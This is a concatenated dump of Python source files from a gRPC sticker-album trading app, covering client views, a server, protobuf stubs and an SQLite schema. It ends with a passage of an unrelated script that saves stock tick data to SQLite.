    def sell(self, idUser, idFigure):
        """Sell one copy of a figure; response carries name and price."""
        message = pb2.MessageClient(idUser=idUser, idFigure=idFigure)
        return self.stub.Sell(message)
    def createTrade(self, idUser, offer, taking):
        """Announce a trade: give figure `offer`, receive figure `taking`."""
        message = pb2.MessageClient(idUser=idUser, offer=offer, taking=taking)
        return self.stub.CreateTrade(message)
    def listTrade(self):
        """List all open trade offers."""
        message = pb2.MessageClient()
        return self.stub.ListTrade(message)
    def trade(self, idUser, idTrade):
        """Execute trade `idTrade` on behalf of `idUser`."""
        message = pb2.MessageClient(idUser=idUser, idTrade=idTrade)
        return self.stub.Trade(message)
|
adrianomqsmts/OneFigure-gRPC | view/singin.py | <gh_stars>0
from controller.client import Client
def singinview(name, password):
    """Request account creation and report the outcome to the user."""
    created = _singin(name, password)
    message = (
        'Conta criada com sucesso.'
        if created
        else 'Não foi possível criar a conta, possívelmente o nome já existe'
    )
    print(message)
    return created
def _singin(name, password):
    """Send a Create RPC; return the server's boolean success flag."""
    reply = Client().create(name=name, password=password)
    return reply.response
|
adrianomqsmts/OneFigure-gRPC | server.py | <gh_stars>0
from controller.server import serve
if __name__ == '__main__':
serve()
|
adrianomqsmts/OneFigure-gRPC | view/login.py | <reponame>adrianomqsmts/OneFigure-gRPC
import json
from controller.client import Client
def loginview(name, password):
    """Authenticate the user; on success show any daily-raffle figure.

    Returns (user, isvalid, figure) on success, (None, None, None) otherwise.
    """
    isvalid, user, figure = _login(name, password)
    if not isvalid:
        print('Nome e/ou senha inválidos')
        return None, None, None
    print('Bem-vindo {}'.format(user.name))
    if user.showcard:
        # The daily raffle awarded a figure: show it once at login.
        print('\n ------------ Figurinha Adquirida no Sorteio díario ------------------')
        print("ID | NOME | RARIDADE | ")
        print(figure.idFigure, '|', figure.name, '|', figure.rarity, '\n')
    return user, isvalid, figure
def _login(name, password):
    """Send a Login RPC; return (isvalid, user, figure) from the reply."""
    reply = Client().login(name=name, password=password)
    return reply.response, reply.user, reply.figure
|
adrianomqsmts/OneFigure-gRPC | controller/server.py | <filename>controller/server.py
import grpc
from concurrent import futures
import proto.message_pb2_grpc as pb2_grpc
import proto.message_pb2 as pb2
import model.user as user
import model.album as album
import model.figura as figure
class MessageService(pb2_grpc.MessageServicer):
    """gRPC handlers for the OneFigure service.

    Each RPC unpacks the protobuf request, delegates to the model layer
    (``user``, ``album``, ``figure``) and wraps the result into the
    matching protobuf response. Handlers log input and output to stdout.
    """
    def __init__(self, *args, **kwargs):
        pass
    def Login(self, request, context):
        """Validate credentials; on success return the user plus the
        daily-raffle figure when one was awarded."""
        # NOTE(review): this logs the plaintext password to stdout — confirm
        # that is acceptable outside of development.
        print('Login -> Name:', request.name, ' - Password: ', request.password)
        name = request.name
        password = request.password
        database = user.login(name=name, password=password)
        if database:
            usuario = {
                'idUser': int(database[0]['idUser']),
                'name': database[0]['name'],
                'balance': float(database[3]),
                'password': database[0]['password'],
                'showcard': int(database[2]['showcard']),
            }
            # A truthy showcard flag means the daily raffle awarded a figure.
            if int(database[2]['showcard']):
                figure = {
                    'idFigure': database[1]['idFigure'],
                    'rarity': database[1]['rarity'],
                    'name': database[1]['name'],
                    'path': database[1]['path']
                }
            else:
                figure = None
            out = {'response': True, 'user': usuario, 'figure': figure}
        else:
            out = {'response': False, 'user': None, 'figure': None}
        print('Response <- ', f'{out}')
        return pb2.LoginResponse(**out)
    def Create(self, request, context):
        """Create a new account; respond with a plain success flag."""
        print('Create -> Name:', request.name, ' - Password: ', request.password)
        name = request.name
        password = request.password
        database = user.create(name=name, password=password)
        if database:
            result = {
                'response': True,
            }
        else:
            result = {
                'response': False,
            }
        print('Response <- ', f'{result}')
        return pb2.Response(**result)
    def Album(self, request, context):
        """Return the user's album: figures, completion flag and, when
        complete, the exclusive special figure."""
        print('Album -> IdUser:', request.idUser)
        idUser = request.idUser
        database = album.show(id_user=idUser)
        if database:
            complete = int(database[1]['complete'])
            if complete:
                special = {
                    'idFigure': database[2]['idFigure'],
                    'rarity': database[2]['rarity'],
                    'name': database[2]['name'],
                    'path': database[2]['path']
                }
            else:
                special = None
            figures = []
            # Present the album in ascending figure-id order.
            newdata = sorted(database[0], key=lambda k: k['idFigure'])
            for data in newdata:
                figures.append({
                    'idFigure': data['idFigure'],
                    'name': data['name'],
                    'rarity': data['rarity'],
                    'path': data['path'],
                    'quantity': data['quantity']
                })
            out = {
                'response': True,
                'complete': complete,
                'special': special,
                'figures': figures,
            }
        else:
            out = {
                'response': False,
                'complete': 0,
                'special': None,
                'figures': None,
            }
        print('Response <- ', f'{out}')
        return pb2.AlbumResponse(**out)
    def Buy(self, request, context):
        """Buy a pack of three figures; return them plus the new balance."""
        print('Buy -> IdUser:', request.idUser)
        idUser = request.idUser
        database = figure.buy(idUser)
        result = []
        if database:
            # Model returns three figures plus the new balance at index 3.
            balance = float(database[3])
            del database[3]
            for i in range(3):
                result.append({
                    'idFigure': database[i]['idFigure'],
                    'rarity': database[i]['rarity'],
                    'name': database[i]['name'],
                    'path': database[i]['path']
                })
            figures = result
            out = {
                'response': True,
                'balance': balance,
                'figures': figures,
            }
        else:
            out = {
                'response': False,
                'balance': None,
                'figures': None,
            }
        print('Response <- ', f'{out}')
        # NOTE(review): this wraps a buy result ('balance'/'figures') in
        # AlbumResponse — confirm the proto really shares one message here.
        return pb2.AlbumResponse(**out)
    def CreateTrade(self, request, context):
        """Register a trade offer after validating both figure ids (0..50)."""
        print('Create Trade -> IdUser:', request.idUser, ' - Offer ID:', request.offer, ' - Taking ID:', request.taking)
        idUser = request.idUser
        offer = request.offer
        taking = request.taking
        if (offer >= 0) and (taking >= 0) and (offer <= 50) and (taking <= 50):
            database = figure.createTrade(idUser=idUser, offer=offer, taking=taking)
            if database:
                out = {
                    'response': True,
                }
            else:
                out = {
                    'response': False,
                }
        else:
            out = {
                'response': False,
            }
        print('Response <- ', f'{out}')
        return pb2.Response(**out)
    def ListTrade(self, request, context):
        """List every open trade offer."""
        print('Listar Trocas -> ')
        database = figure.listTrade()
        if database:
            result = []
            for data in database:
                result.append({
                    'name': data['name'],
                    'idTrade': data['idTrade'],
                    'offerID': data['offerID'],
                    'offerName': data['offerName'],
                    'offerRarity': data['offerRarity'],
                    'takingID': data['takingID'],
                    'takingName': data['takingName'],
                    'takingRarity': data['takingRarity']
                })
            out = {
                'response': True,
                'list': result
            }
        else:
            out = {
                'response': False,
                'list': None
            }
        # Bug fix: `result` is undefined when the database returns nothing,
        # which raised NameError here; log the response dict instead.
        print('response <-', f'{out}')
        return pb2.ListTradeResponse(**out)
    def Sell(self, request, context):
        """Sell one copy of a figure; return its name and sale price."""
        print('Sell -> ID User: ', request.idUser, ' - ID Figure: ', request.idFigure)
        database = figure.sell(request.idUser, request.idFigure)
        print(database)
        if database:
            name = database['name']
            price = float(database['price'])
            out = {
                'response': True,
                'price': price,
                'name': name
            }
        else:
            out = {
                'response': False,
                'price': None,
                'name': None
            }
        print('Response <- ', out)
        return pb2.SellResponse(**out)
    def Trade(self, request, context):
        """Execute a previously announced trade for the requesting user."""
        print('Trade -> ID User: ', request.idUser, ' - ID Trade: ', request.idTrade)
        idUser = request.idUser
        idTrade = request.idTrade
        database = figure.trade(idUser, idTrade)
        if database:
            out = {
                'response': True
            }
        else:
            out = {
                'response': False
            }
        print('Responde <- ', out)
        return pb2.Response(**out)
def serve():
    """Start the gRPC server on port 50051 and block until it terminates."""
    grpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
    pb2_grpc.add_MessageServicer_to_server(MessageService(), grpc_server)
    grpc_server.add_insecure_port('[::]:50051')
    grpc_server.start()
    print('SERVIDOR INICIADO...')
    grpc_server.wait_for_termination()
|
adrianomqsmts/OneFigure-gRPC | view/offer.py | <filename>view/offer.py
import json
from controller.client import Client
def offerview(user, offer, taking):
    """Announce a trade offer and report whether the server accepted it."""
    accepted = _offer(user, offer, taking)
    if not accepted:
        print('Lamentamos, mas não alguma coisa não está correta (quantidade insuficente ou ID incorreto)')
        return None
    print('A troca foi anunciada')
    return accepted
def _offer(user, offer, taking):
    """Send a CreateTrade RPC for *user*; return the boolean response."""
    reply = Client().createTrade(idUser=user.idUser, offer=offer, taking=taking)
    return reply.response
|
adrianomqsmts/OneFigure-gRPC | SQLite/tables.py | <reponame>adrianomqsmts/OneFigure-gRPC
# 02_create_schema.py
import sqlite3
# connect to (or create) the local SQLite database file
conn = sqlite3.connect('oneFigure.db')
# cursor used for all DDL statements below
cursor = conn.cursor()
# create the schema; IF NOT EXISTS makes the script idempotent
cursor.execute("""
CREATE TABLE IF NOT EXISTS `Usuario` (
`idUser` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`name` VARCHAR(45) NOT NULL UNIQUE,
`balance` DOUBLE NOT NULL DEFAULT 100,
`password` VARCHAR(45) NOT NULL,
`login` DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
);
""")
cursor.execute("""
CREATE TABLE IF NOT EXISTS `Figure` (
`idFigure` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`name` VARCHAR(45) NOT NULL,
`rarity` VARCHAR(10) NOT NULL,
`path` VARCHAR(45) NOT NULL);
""")
cursor.execute("""
CREATE TABLE IF NOT EXISTS `Album` (
`idUser` INTEGER NOT NULL,
`idFigure` INTEGER NOT NULL,
`quantity` INT NOT NULL DEFAULT 0,
PRIMARY KEY (`idFigure`, `idUser`),
CONSTRAINT `fk_Usuario_has_Figura_Usuario`
FOREIGN KEY (`idUser`)
REFERENCES `Usuario` (`idUser`)
ON DELETE CASCADE
ON UPDATE CASCADE,
CONSTRAINT `fk_Usuario_has_Figura_Figura1`
FOREIGN KEY (`idFigure`)
REFERENCES `Figure` (`idFigure`)
ON DELETE CASCADE
ON UPDATE CASCADE);
""")
cursor.execute("""
CREATE TABLE IF NOT EXISTS `Trade` (
`idTrade` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`idUser` INT NOT NULL,
`offer` INT NOT NULL,
`taking` INT NOT NULL,
CONSTRAINT `fk_Trade_Usuario1`
FOREIGN KEY (`idUser`)
REFERENCES `Usuario` (`idUser`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_Trade_Figure1`
FOREIGN KEY (`offer`)
REFERENCES `Figure` (`idFigure`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_Trade_Figure2`
FOREIGN KEY (`taking`)
REFERENCES `Figure` (`idFigure`)
ON DELETE NO ACTION
ON UPDATE NO ACTION);
""")
print('Tabelas criadas com sucesso.')
# NOTE(review): there is no conn.commit() here; Python's sqlite3 module runs
# DDL outside the implicit transaction, so the tables persist — confirm on
# the targeted Python version.
# disconnect
conn.close()
|
adrianomqsmts/OneFigure-gRPC | view/album.py | <gh_stars>0
import json
from controller.client import Client
def albumview(user):
    """Print the user's album and return its figures (None when missing)."""
    isvalid, complete, special, figures = _album(user)
    if not isvalid:
        print('Lamentamos, mas não foi possível encontrar o álbum')
        return None
    print('\n ------------ ALBUM ------------------')
    print("ID | NOME | RARIDADE | QUANTIDADE")
    for item in figures:
        print(item.idFigure, '|', item.name, '|', item.rarity, '|', item.quantity)
    if complete == 1:
        # A complete album unlocks the exclusive special figure.
        print('\nParabéns você completou o album e ganhou uma figurinha ESPECIAL exclusiva:\n')
        print("ID | NOME | RARIDADE")
        print(special.idFigure, '|', special.name, '|', special.rarity)
    print()
    return figures
def _album(user):
    """Send an Album RPC; return (isvalid, complete, special, figures)."""
    reply = Client().album(idUser=user.idUser)
    return reply.response, reply.complete, reply.special, reply.figures
|
adrianomqsmts/OneFigure-gRPC | view/figura.py | import json
from controller.client import Client
def figureview(user):
    """Buy a pack of figures for *user*; print them and the new balance."""
    isvalid, balance, figures = _figure(user)
    if not isvalid:
        print('Não foi possivel fazer a compra saldo insuficiente')
        return None
    print('\n ------------ Figurinhas Adquiridas ------------------')
    print("ID | NOME | RARIDADE | ")
    for item in figures:
        print(item.idFigure, '|', item.name, '|', item.rarity)
    print('\nseu novo saldo é de', balance, "moedas")
    print()
    return figures
def _figure(user):
    """Send a Buy RPC; return (isvalid, balance, figures)."""
    reply = Client().buy(idUser=user.idUser)
    return reply.response, reply.balance, reply.figures
def figuresellview(user, figure):
    """Sell one copy of *figure* for *user* and print the result.

    Returns (isvalid, name, price) on success, or (None, None, None) when
    the user does not own enough copies of the figure.
    """
    isvalid, price, name = _figuresell(user, figure)
    if not isvalid:
        print('Não foi possivel fazer a venda, você não possui uma ou mais cópias dessa figurinha')
        return None, None, None
    print('\n ------------ Figurinhas Vendidas ------------------')
    print(name, 'por', price, 'moedas')
    print()
    return isvalid, name, price
def _figuresell(user, idFigure):
    """Request a sale of figure *idFigure* for *user* via the gRPC client.

    Returns (isvalid, price, name) unpacked from the SellResponse.
    """
    reply = Client().sell(idUser=user.idUser, idFigure=int(idFigure))
    return reply.response, reply.price, reply.name
|
adrianomqsmts/OneFigure-gRPC | SQLite/connect.py | <filename>SQLite/connect.py
import sqlite3

# Touch the database file once so 'oneFigure.db' exists on disk; no schema
# work is done here.
sqlite3.connect('oneFigure.db').close()
|
adrianomqsmts/OneFigure-gRPC | view/trade.py | <gh_stars>0
from controller.client import Client
def tradeview(user, idTrade):
    """Execute trade *idTrade* for *user* and print the outcome.

    Returns the server's success flag.
    """
    isvalid = _trade(user.idUser, idTrade)
    message = ('A troca ocorreu com sucesso'
               if isvalid
               else 'Lamentamos, mas não foi possível finalizar a troca, verifique suas cartas')
    print(message)
    return isvalid
def _trade(idUser, idTrade):
    """Send the trade request to the gRPC server; return its success flag."""
    return Client().trade(idUser=idUser, idTrade=idTrade).response
adrianomqsmts/OneFigure-gRPC | view/anunciar.py | <gh_stars>0
import json
from controller.client import Client
def anunciarview():
    """Print every advertised trade and return the list, or None on failure."""
    isvalid, trades = _anunciar()
    if not isvalid:
        print('Lamentamos, mas não foi possível exibir as trocas')
        return None
    print("--------------------- LISTA DE TROCAS -------------------")
    for trade in trades:
        print("Usuário {", trade.name, '} - Código da Troca: {', trade.idTrade, '}')
        print("Oferece -> ID figura: ", trade.offerID, '- Nome: ', trade.offerName, ' - Raridade: ',
              trade.offerRarity)
        print("Deseja <- ID figura: ", trade.takingID, '- Nome: ', trade.takingName, ' - Raridade: ',
              trade.takingRarity)
        # Visual separator between consecutive trades.
        print('--------------------- ------*----- -------------------')
    return trades
def _anunciar():
    """Fetch all advertised trades from the gRPC server.

    Returns (isvalid, trades) unpacked from the ListTradeResponse.
    """
    reply = Client().listTrade()
    return reply.response, reply.list
|
adrianomqsmts/OneFigure-gRPC | proto/message_pb2_grpc.py | <gh_stars>0
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from proto import message_pb2 as proto_dot_message__pb2
class MessageStub(object):
    """Client-side stub for the proto.Message gRPC service.

    Command used to generate this file (do not hand-edit; regenerate instead):
    python -m grpc_tools.protoc --proto_path=. .\proto\message.proto --python_out=. --grpc_python_out=.
    How to write PROTO files:
    https://developers.google.com/protocol-buffers/docs/proto3
    How to send an array of data:
    https://stackoverflow.com/questions/43167762/how-to-return-an-array-in-protobuf-service-rpc
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # One callable per unary-unary RPC; every RPC takes a MessageClient
        # request and deserializes its service-specific response type.
        self.Login = channel.unary_unary(
                '/proto.Message/Login',
                request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
                response_deserializer=proto_dot_message__pb2.LoginResponse.FromString,
                )
        self.Create = channel.unary_unary(
                '/proto.Message/Create',
                request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
                response_deserializer=proto_dot_message__pb2.Response.FromString,
                )
        self.Album = channel.unary_unary(
                '/proto.Message/Album',
                request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
                response_deserializer=proto_dot_message__pb2.AlbumResponse.FromString,
                )
        self.Buy = channel.unary_unary(
                '/proto.Message/Buy',
                request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
                response_deserializer=proto_dot_message__pb2.AlbumResponse.FromString,
                )
        self.Sell = channel.unary_unary(
                '/proto.Message/Sell',
                request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
                response_deserializer=proto_dot_message__pb2.SellResponse.FromString,
                )
        self.CreateTrade = channel.unary_unary(
                '/proto.Message/CreateTrade',
                request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
                response_deserializer=proto_dot_message__pb2.Response.FromString,
                )
        self.ListTrade = channel.unary_unary(
                '/proto.Message/ListTrade',
                request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
                response_deserializer=proto_dot_message__pb2.ListTradeResponse.FromString,
                )
        self.Trade = channel.unary_unary(
                '/proto.Message/Trade',
                request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
                response_deserializer=proto_dot_message__pb2.Response.FromString,
                )
class MessageServicer(object):
    """Server-side interface for the proto.Message gRPC service.

    Subclass and override each method to implement the service; the generated
    defaults reply UNIMPLEMENTED.

    Command used to generate this file (do not hand-edit; regenerate instead):
    python -m grpc_tools.protoc --proto_path=. .\proto\message.proto --python_out=. --grpc_python_out=.
    How to write PROTO files:
    https://developers.google.com/protocol-buffers/docs/proto3
    How to send an array of data:
    https://stackoverflow.com/questions/43167762/how-to-return-an-array-in-protobuf-service-rpc
    """

    def Login(self, request, context):
        """Calls the server's Login handler with the client's LOGIN message.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Create(self, request, context):
        """Calls the server handler that registers a new user.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Album(self, request, context):
        """Calls the server handler that displays the album.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Buy(self, request, context):
        """Calls the server handler that performs the purchase and shows the figures.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Sell(self, request, context):
        """Calls the sell handler and shows the figures obtained.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def CreateTrade(self, request, context):
        """Calls the trade-creation handler and replies whether it was created.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListTrade(self, request, context):
        """Calls the handler that lists every registered trade.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Trade(self, request, context):
        """Calls the handler that lists every registered trade.

        NOTE(review): this docstring was copy-pasted from ListTrade in the
        .proto source; presumably this RPC actually executes a trade --
        confirm against proto/message.proto.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_MessageServicer_to_server(servicer, server):
    """Register a MessageServicer implementation on a grpc.Server.

    Maps each RPC name to its handler together with the request deserializer
    and the response serializer matching the types declared in the stub.
    """
    rpc_method_handlers = {
            'Login': grpc.unary_unary_rpc_method_handler(
                    servicer.Login,
                    request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
                    response_serializer=proto_dot_message__pb2.LoginResponse.SerializeToString,
            ),
            'Create': grpc.unary_unary_rpc_method_handler(
                    servicer.Create,
                    request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
                    response_serializer=proto_dot_message__pb2.Response.SerializeToString,
            ),
            'Album': grpc.unary_unary_rpc_method_handler(
                    servicer.Album,
                    request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
                    response_serializer=proto_dot_message__pb2.AlbumResponse.SerializeToString,
            ),
            'Buy': grpc.unary_unary_rpc_method_handler(
                    servicer.Buy,
                    request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
                    response_serializer=proto_dot_message__pb2.AlbumResponse.SerializeToString,
            ),
            'Sell': grpc.unary_unary_rpc_method_handler(
                    servicer.Sell,
                    request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
                    response_serializer=proto_dot_message__pb2.SellResponse.SerializeToString,
            ),
            'CreateTrade': grpc.unary_unary_rpc_method_handler(
                    servicer.CreateTrade,
                    request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
                    response_serializer=proto_dot_message__pb2.Response.SerializeToString,
            ),
            'ListTrade': grpc.unary_unary_rpc_method_handler(
                    servicer.ListTrade,
                    request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
                    response_serializer=proto_dot_message__pb2.ListTradeResponse.SerializeToString,
            ),
            'Trade': grpc.unary_unary_rpc_method_handler(
                    servicer.Trade,
                    request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
                    response_serializer=proto_dot_message__pb2.Response.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'proto.Message', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
 # This class is part of an EXPERIMENTAL API.
class Message(object):
    """Static one-shot invokers for the proto.Message service (no stub needed).

    Command used to generate this file (do not hand-edit; regenerate instead):
    python -m grpc_tools.protoc --proto_path=. .\proto\message.proto --python_out=. --grpc_python_out=.
    How to write PROTO files:
    https://developers.google.com/protocol-buffers/docs/proto3
    How to send an array of data:
    https://stackoverflow.com/questions/43167762/how-to-return-an-array-in-protobuf-service-rpc
    """

    @staticmethod
    def Login(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/proto.Message/Login',
            proto_dot_message__pb2.MessageClient.SerializeToString,
            proto_dot_message__pb2.LoginResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Create(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/proto.Message/Create',
            proto_dot_message__pb2.MessageClient.SerializeToString,
            proto_dot_message__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Album(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/proto.Message/Album',
            proto_dot_message__pb2.MessageClient.SerializeToString,
            proto_dot_message__pb2.AlbumResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Buy(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/proto.Message/Buy',
            proto_dot_message__pb2.MessageClient.SerializeToString,
            proto_dot_message__pb2.AlbumResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Sell(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/proto.Message/Sell',
            proto_dot_message__pb2.MessageClient.SerializeToString,
            proto_dot_message__pb2.SellResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def CreateTrade(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/proto.Message/CreateTrade',
            proto_dot_message__pb2.MessageClient.SerializeToString,
            proto_dot_message__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def ListTrade(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/proto.Message/ListTrade',
            proto_dot_message__pb2.MessageClient.SerializeToString,
            proto_dot_message__pb2.ListTradeResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Trade(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/proto.Message/Trade',
            proto_dot_message__pb2.MessageClient.SerializeToString,
            proto_dot_message__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
adrianomqsmts/OneFigure-gRPC | controller/connect.py | def connect():
import sqlite3
conn = sqlite3.connect('oneFigure.db')
return conn
# Fonte: http://pythonclub.com.br/gerenciando-banco-dados-sqlite3-python-parte1.html
|
xxm1988/futuquant | futuquant/examples/app/tq_save_tick/TinyStrateSaveTick.py | # encoding: UTF-8
'''
实盘策略范例,接口用法见注释及范例代码
'''
import talib
import sqlite3
import platform
import multiprocessing
from sqlalchemy import create_engine
from futuquant.examples.TinyQuant.TinyStrateBase import *
class SaveTickData():
    """Persist tick and order-book data for one stock into local SQLite files.

    Two database handles are opened: one for order-book snapshots and one for
    tick-by-tick trades.  File paths are hard-coded per platform.
    """

    # Order-book snapshot fields delivered by the quote callback:
    # askPrice1..5, askVolume1..5, bidPrice1..5, bidVolume1..5,
    # date, datetime, highPrice, lastPrice, lowPrice, openPrice,
    # preClosePrice, priceSpread, symbol, time, volume
    # (The original file left this list as a stray class-level tuple
    # expression; it had no effect, so it is kept as a comment.)

    def __init__(self, stock_code):
        # e.g. 'HK.00700' -> suffix '00700', used in per-stock table names.
        self.stock_code = stock_code
        self.code_suffix = stock_code.split('.')[1]
        if platform.system() == "Windows":
            self.sqlitedb_order = sqlite3.connect(u"F:\\StockData\\stock_order.db")
            self.sqlitedb_tick = sqlite3.connect(u"F:\\StockData\\stock_tick.db")
        else:
            self.sqlitedb_order = sqlite3.connect(u"/data/ft_hist_data/tick_data/stock_order.db")
            self.sqlitedb_tick = sqlite3.connect(u"/data/ft_hist_data/tick_data/stock_tick.db")

    def __del__(self):
        # BUG FIX: the original closed 'self.sqlitedb_conn', an attribute that
        # is never created, raising AttributeError on teardown.  Close both
        # real connections, best-effort (attributes may be missing if
        # __init__ itself failed).
        for conn in (getattr(self, 'sqlitedb_order', None),
                     getattr(self, 'sqlitedb_tick', None)):
            if conn is not None:
                try:
                    conn.close()
                except Exception:
                    pass  # never raise from a destructor

    def exe_sql(self, sql_cmd, db='tick'):
        """Execute *sql_cmd* on the tick (default) or order database and
        return all fetched rows."""
        cu = (self.sqlitedb_tick if db == "tick" else self.sqlitedb_order).cursor()
        cu.execute(sql_cmd)
        return cu.fetchall()

    def exe_sql_many(self, sql_cmd, insertDataList, db='tick'):
        """executemany *sql_cmd* with parameter rows *insertDataList* on the
        tick (default) or order database."""
        cu = (self.sqlitedb_tick if db == "tick" else self.sqlitedb_order).cursor()
        cu.executemany(sql_cmd, insertDataList)
        return cu.fetchall()

    def create_tick_table(self):
        """Create the per-stock tick table in the tick database if missing."""
        # BUG FIX: 'pirmary key' was misspelled; SQLite silently accepted the
        # typo as part of the column's type name, so no primary key (and no
        # dedup on 'sequence') was ever enforced.
        sql_cmd_create = """create TABLE IF NOT EXISTS tick_data_%s (
            [date_key] DATE DEFAULT CURRENT_DATE,
            [time] TIME DEFAULT CURRENT_TIME,
            [code] TEXT,
            [price] FLOAT,
            [volume] FLOAT,
            [turnover] FLOAT,
            [ticker_direction] TEXT,
            [sequence] TEXT primary key,
            [type] TEXT ) """ % self.code_suffix
        self.exe_sql(sql_cmd_create)
        self.sqlitedb_tick.commit()

    def create_order_table(self):
        """Create the per-stock order-book table if missing.

        NOTE(review): this executes on the tick database (exe_sql's default)
        and commits sqlitedb_tick, so the order table lives in stock_tick.db
        and sqlitedb_order is never written -- confirm this is intended.
        """
        sql_cmd_create = """create TABLE IF NOT EXISTS order_data_%s (
            [date_key] DATE DEFAULT CURRENT_DATE,
            [time] TIME DEFAULT CURRENT_TIME,
            [code] TEXT,
            [askPrice1] FLOAT,
            [askPrice2] FLOAT,
            [askPrice3] FLOAT,
            [askPrice4] FLOAT,
            [askPrice5] FLOAT,
            [askVolume1] FLOAT,
            [askVolume2] FLOAT,
            [askVolume3] FLOAT,
            [askVolume4] FLOAT,
            [askVolume5] FLOAT,
            [bidPrice1] FLOAT,
            [bidPrice2] FLOAT,
            [bidPrice3] FLOAT,
            [bidPrice4] FLOAT,
            [bidPrice5] FLOAT,
            [bidVolume1] FLOAT,
            [bidVolume2] FLOAT,
            [bidVolume3] FLOAT,
            [bidVolume4] FLOAT,
            [bidVolume5] FLOAT,
            [highPrice] FLOAT,
            [lowPrice] FLOAT,
            [lastPrice] FLOAT,
            [openPrice] FLOAT,
            [preClosePrice] FLOAT,
            [priceSpread] FLOAT,
            [volume] FLOAT ) """ % self.code_suffix
        self.exe_sql(sql_cmd_create)
        self.sqlitedb_tick.commit()

    def save_data_tick(self, df):
        """Replace-insert tick rows from DataFrame *df* and commit.

        NOTE(review): the statement targets table 'stock_list_new' while
        create_tick_table creates 'tick_data_<code>' -- confirm which table
        the live database actually uses.
        """
